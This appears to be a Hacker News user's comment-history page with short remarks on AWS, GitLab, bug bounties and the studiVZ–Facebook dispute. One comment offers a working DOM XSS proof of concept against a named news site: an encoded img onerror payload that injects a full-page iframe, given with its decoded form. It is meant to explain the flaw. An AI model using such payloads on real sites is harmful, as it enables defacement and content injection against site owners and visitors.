HNHacker News
TopNewBestAskShowJobs

nilsjuenemann

1,336 karma · joined August 29, 2011

http://www.nilsjuenemann.de/?hn

[ my public key: https://keybase.io/nilsjuenemann; my proof: https://keybase.io/nilsjuenemann/sigs/hKuU8-wqBInXLIHlS27JWDJjcuGVQ6IKnq6vDXv3D2E ]

submissionscomments
nilsjuenemann··on [dead]
Yes, eu-central-1c all instances down. A lot of services responding with 503, console has problems as well (errors loading services, API calls with 503). Started 7:29 UTC.

We saw also connection timeouts to DynamoDB and Kinesis from ec2 instances.

Update from AWS:

12:08 AM PST We are investigating increased network connectivity errors to instances in a single Availability Zone in the EU-CENTRAL-1 Region.

12:28 AM PST We are experiencing elevated API error rates and network connectivity errors in a single Availability Zone. We have identified the root cause and are working to resolve the issue.

nilsjuenemann··on TP-82 Cosmonaut survival pistol
Why is this on HN? It's again another $random Wikipedia article.
nilsjuenemann··on Dqlite – High-Availability SQLite
Hm. Just enterprise-grade. I need military-grade und planet-scale.
nilsjuenemann··on GitLab 10.4 released
It looks like that GitLab got the Featuritis. Instead of adding tons of unready and half baked feature it should focus on stability and performance.
nilsjuenemann··on AWS Media Services – Process, Store, and Monetize Cloud-Based Video
Ah, actually the packager supports MPEG-DASH as output.
nilsjuenemann··on AWS Media Services – Process, Store, and Monetize Cloud-Based Video
For AWS Elemental MediaLive there is no MPEG-DASH output. It's also limited to Ireland, Singapore, Virginia and Oregon.
nilsjuenemann··on Git 2.9 released
Is there already a pre-built package for MacOSX?
nilsjuenemann··on Amazon Echo Dot
Only for US customers...

"Requirements

* A U.S. Amazon account

* A U.S. shipping address (50 United States and the District of Columbia only)

* An annual Amazon Prime membership or 30-day Amazon Prime free trial

* A payment method issued by a U.S. bank with a U.S. billing address in your 1-Click settings

* A device with access to the Alexa Voice Service (such as Amazon Echo)"

nilsjuenemann··on Ask HN: Is a static site hosted on AWS S3 'hackable'?
That isn't true. Every static website could be vulnerable through DOM XSS. In this case the integrity of the site is violated.

PoC: http://bit.ly/1S834lS - redirects to http://www.heute.de/#"><img src=x onerror=document.write(String.fromCharCode(60,105,102,114,97,109,101, 32,115,114,99,61,34,104,116,116,112,58,47,47,99,97,116, 46,119,119,119,46,104,101,117,116,101,46,100,101,46,109,101,111,119, 98,105,102,121,46,99,111,109,47,34,32,115,116,121,108,101,61,34,98, 111,114,100,101,114,58,32,48,59,32,119,105,100,116,104,58,32,49,48, 48,37,59,32,104,101,105,103,104,116,58,32,49,48,48,37,59,32,109,97, 114,103,105,110,58,32,45,56,112,120,59,112,111,115,105,116,105,111, 110,58,32,97,98,115,111,108,117,116,101,59,34,62))>

We just inject a iframe through the onerror handler of the <img> tag:

<iframe src="http://cat.www.heute.de.meowbify.com/" style="border: 0; width: 100%; height: 100%; margin: -8px;position: absolute;"></iframe>

In this case the site is using a outdated jQuery version, which is vulnerable to this kind of attack.

http://bugs.jquery.com/ticket/9521

nilsjuenemann··on Show HN: Replicate the world's best stock investments
Investing directly in the market (via EFT) is always a good idea. Look at this chart, percentage change of S&P 600 SPY EFT in the last 3y. 60% increase.

https://www.tradingview.com/x/r6ahpcAy/

If your timeframe is long, buy & hold is alaways a good strategy.

nilsjuenemann··on Breastfeeding 'linked to higher IQ'
It's already known since a while that breastfeeding is a reason for a higher IQ. There was a study in 2007 that the correlation between breastfeeding and the IQ is moderated by genetic variant in FADS2.

http://www.ncbi.nlm.nih.gov/pubmed/17984066

nilsjuenemann··on “2015 will be the year that Perl 6 officially launches for production use”
I am still waiting for Hurd.
nilsjuenemann··on Programming Language Network: A Graph of Programming Languages
This is a more useful visualisation of programming languages:

http://exploringdata.github.io/vis/programming-languages-inf...

nilsjuenemann··on AWS Frankfurt, Germany Region
Welcome to Frankfurt. I've found a first sign of a upcoming germany zone some month ago. Here is the posting of it: http://www.nilsjuenemann.de/2014/07/new-aws-region-eu-centra...
nilsjuenemann··on HTTP 402 – Payment Required
It's in RFC 2068 since 1997.

http://www.ietf.org/rfc/rfc2068.txt

Nothing new here.

nilsjuenemann··on Free static page hosting on Google without App Engine in seconds
I think that's a much more simpler way as the approach with App Engine, posted some days ago here.

https://news.ycombinator.com/item?id=7252435

nilsjuenemann··on GitHub Security Bug Bounty
That's from the private beta:

"We are using a simple severity ranking scheme: Low - Medium - High - Critical. Rewards range from $100 up to $5000 and are determined at our discretion based on a number of factors. For example, if you find a reflected XSS that is only possible in Opera, and Opera is only 1.64% of our traffic, then the severity and reward will be lower. But a persistent XSS that works in Chrome, at 59.53% of our traffic, will earn a much larger reward."

nilsjuenemann··on GitHub Security Bug Bounty
Great news. I'm happy to see this program in "public mode" now. GitHub launched this program already as private beta in May 2013.

https://twitter.com/totally_unknown/status/42899282447475916...

Don't expect to earn easy cash here. :)

nilsjuenemann··on Google Account Recovery Vulnerability
Vulnerability Reward Programs are getting more and more popular. @homakov and @bef0rd made a script for collecting all people listed in a security "Hall of Fame":

http://beford.net/hustlers/hustlers.html

nilsjuenemann··on Stored XSS in GMail for iOS
There are two options:

1) He is using Windows and is not using Burp or ZAP proxy for modifying http requests. With Windows you can't use <>"= in a filename.

2) Gmail is handling emails from Google Analytics a bit different. (I don't think so)

nilsjuenemann··on Facebook PHP Source Code from August 2007
I think the most popular social network is Facebook. But as others said, people are looking for small services to solve a small problem.

studiVZ wasn't cool anymore. We missed the point for a rebrand to open the plattform for other people. "studi" is a abbreviation for student. Our answer was a new brand called meinVZ (just another UI, same database). Together with the ability to provide new cool features (e.g. Apps, Activity stream, i18n) it was just a question of time until FB was getting the market leadership.

nilsjuenemann··on Facebook PHP Source Code from August 2007
Excactly. But you can't compete if don't have enough (and the best) people and enough budget for recruiting.
nilsjuenemann··on Facebook PHP Source Code from August 2007
We had to solve scaling issues most of the time. VZ was running on a multi-tier platform with services written in Java, PHP, Erlang, C++ and Python. 17 million users with around 25 billion requests per month (without static content)...

Some numbers from 2010:

- 60.000 req/s (without static content)

- 2.5 mio. memcache ops/s

- 300k queries to the database tier

We've built that platform with a team of around 20-30 engineers and we had to solve the scaling stuff first - before we could add new features to the platform.

Today it's easy to store 3 billion files (photos). You could easily use S3, but 2007 these services didn't exist or most of the cloud services just started with their services.

nilsjuenemann··on Facebook PHP Source Code from August 2007
I remeber these days. I worked at this time for studiVZ - a german social network (still exist, but nobody is using it anymore) and this leaked was caused by a misconfiguration in their Apache setup.

In 2008 studiVZ was sued by Facebook. They said we theft their PHP, CSS/JS "code". (http://techcrunch.com/2008/07/18/facebook-sues-german-social...).

Indeed, the first version of studiVZ was inspired by Facebook. Our founder had seen FB in 2005 the first time in the US, but it wasn't possible to use the service without a .edu eMail account. That was the decision to make a local clone.

But the real story behind the lawsuit is a bit longer. In december 2006 Facebook tried to acquire studiVZ the very first time.

This picture with two of the studiVZ founder and some people from FB's management team is from this time:

http://img-a4.pe.imagevz.net/photo3/f3/9a/ce37499d84437cb744...

But FB hadn't the amount of cash to aquire the company. The Holtzbrinck Publishing Group aquired studiVZ later for 85 mio. €

In 2008 (before the lawsuit) FB tried the second time to acquire studiVZ - this time for 4,8% of shares! But this deal didn't happend - unfortunately.

nilsjuenemann··on Show HN: I made an HN job board
It's pretty bad that I have to enter my HN password.
nilsjuenemann··on Hijacking a Facebook Account with SMS
This bug shows us, how bad their software really is and that all the PHP crap on their frontend can access every data from every users. If they have had a "middleware" between frontend and database, such kind of bugs weren't possible.

Anyone remember the bug as everyone had access to private photos of Marc Zuckerberg?

http://www.telegraph.co.uk/technology/facebook/8938725/Faceb...

Same auth-bypass shit.

nilsjuenemann··on As promised, Kim Dotcom starts payouts for Mega vulnerability reward program
Here some facts and numbers about Google's VRP:

http://www.nilsjuenemann.de/2012/12/news-about-googles-vulne...

nilsjuenemann··on Is Facebook becoming the next MySpace?
So it's not that MySpace lost and Facebook won. It's that MySpace won first, and Facebook won next. They'll go down in the same order.
nilsjuenemann··on The only way to get hold of a human at Google
Do you using Chrome with these two extensions?

https://chrome.google.com/webstore/detail/mihcahmgecmbnbcchb... https://chrome.google.com/webstore/detail/ejidjjhkpiempkbhmp...

For me these combination made a request loop (response from gmail was 404 and 501) for some circumstances. As a result my account was temporary disabled ...

nilsjuenemann··on How a tweet about a XSS bug within Google+ leads to XSS within InformationWeek
http://lcamtuf.coredump.cx/postxss/

It's a good writeup about the post-xss world and what kind of attacks are still exist.

Page 1 of 2Next →